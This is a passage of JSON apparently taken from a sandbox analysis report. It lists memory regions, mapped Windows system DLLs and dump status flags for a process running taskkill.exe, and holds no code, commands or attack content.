"00:01:29.794", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_3627", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:29.797", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_3628", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:29.797", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 983039, "entry_point": 0, "filename": null, "id": "region_3629", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:01:29.797", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_3630", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:01:29.797", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 15204352, "type": "region", "version": 1 }, "end_va": 15294463, "entry_point": 15228041, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_3631", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 15204352, "timestamp": "00:01:29.797", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_3632", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:29.797", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_3633", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:29.798", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_3634", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:29.798", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_3635", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:29.798", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_3636", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:29.798", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_3637", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:29.798", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3638", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:29.798", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_3639", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:29.798", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_3640", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:29.798", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 2490367, "entry_point": 0, "filename": null, "id": "region_3641", "name": "private_0x00000000001e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1966080, "timestamp": "00:01:29.804", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_3642", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:29.804", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_3643", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:29.805", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_3644", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:29.805", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_3645", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:29.805", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_3646", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:29.805", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_3665", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:29.843", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3666", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:29.843", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1404927, "entry_point": 983040, "filename": "\\Windows\\System32\\locale.nls", "id": "region_3667", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 983040, "timestamp": "00:01:29.843", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1835007, "entry_point": 0, "filename": null, "id": "region_3668", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:01:29.844", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 4915199, "entry_point": 0, "filename": null, "id": "region_3669", "name": "private_0x00000000003b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3866624, "timestamp": "00:01:29.844", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1786445824, "type": "region", "version": 1 }, "end_va": 1787408383, "entry_point": 1786450894, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_3670", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1786445824, "timestamp": "00:01:29.844", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1787428864, "type": "region", "version": 1 }, "end_va": 1787490303, "entry_point": 1787433633, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_3671", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1787428864, "timestamp": "00:01:29.844", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1787494400, "type": "region", "version": 1 }, "end_va": 1787564031, "entry_point": 1787499264, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_3672", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1787494400, "timestamp": "00:01:29.844", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1787625472, "type": "region", "version": 1 }, "end_va": 1787678719, "entry_point": 1787630048, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_3673", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1787625472, "timestamp": "00:01:29.845", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1787691008, "type": "region", "version": 1 }, "end_va": 1787908095, "entry_point": 1787696085, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_3674", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1787691008, "timestamp": "00:01:29.845", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_3675", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:29.846", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1944256512, "type": "region", "version": 1 }, "end_va": 1944293375, "entry_point": 1944262054, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_3676", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1944256512, "timestamp": "00:01:29.846", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_3677", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:29.847", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_3678", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:29.847", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_3679", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:29.847", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_3680", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:29.848", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_3681", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:29.848", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_3682", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:29.849", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_3683", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:29.849", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_3684", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:29.850", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_3685", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:29.850", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_3686", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:29.850", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_3687", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:29.852", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_3688", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:29.852", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_3689", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:29.853", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_3690", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:29.853", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_3691", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:29.854", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_3692", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:29.854", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_3693", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:29.854", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_3694", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:29.855", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_3695", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:29.855", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_3696", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:29.856", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_3697", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:29.856", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3698", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:29.856", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4915200, "type": "region", "version": 1 }, "end_va": 6520831, "entry_point": 0, "filename": null, "id": "region_3699", "name": "pagefile_0x00000000004b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4915200, "timestamp": "00:01:29.914", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_3700", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:29.914", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_3701", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:29.915", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_3702", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:30.024", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 466943, "entry_point": 0, "filename": null, "id": "region_3703", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:01:30.024", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 540671, "entry_point": 524288, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_3704", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", 